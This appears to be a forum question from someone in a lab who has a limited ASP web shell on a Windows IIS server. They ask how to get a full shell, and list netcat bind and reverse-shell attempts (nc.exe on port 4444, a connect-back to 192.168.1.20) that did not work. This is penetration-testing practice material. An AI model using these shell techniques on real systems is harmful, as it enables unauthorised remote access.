Here's the scenario: I have got a limited shell on a server in a lab through a web application vulnerability.
By "limited shell", I mean:
- The shell doesn't give me any output on the screen and I cannot output results of commands in a file
- I can change directory and list files (using a second ASP shell), but that's about it.
- I am able to ftp files/modify files into the web root directory (for example, I have uploaded nc.exe in C:\inetpub\wwwroot)
So for example:
C:\Windows\system32>cd ../.. (works)
C:\>cd inetpub\wwwroot (works)
C:\inetpub\wwwroot> dir (doesn't display anything)
C:\inetpub\wwwroot> dir > files.txt (doesn't create a file)
C:\inetpub\wwwroot> nc.exe -lvp 4444 (doesn't work)
C:\inetpub\wwwroot> nc.exe -v 192.168.1.20 4444 (doesn't work either)
I have tried 5 or 6 different ASP shells, but couldn't get much more out of it.
So what approach should I take at this point? Write my own ASP shell code? Focus on trying to get a full shell (for example, using netcat somehow)? Maybe priv escalation (I don't think so at this point, but I could be wrong)
I really just need a direction so I can continue working on a solution...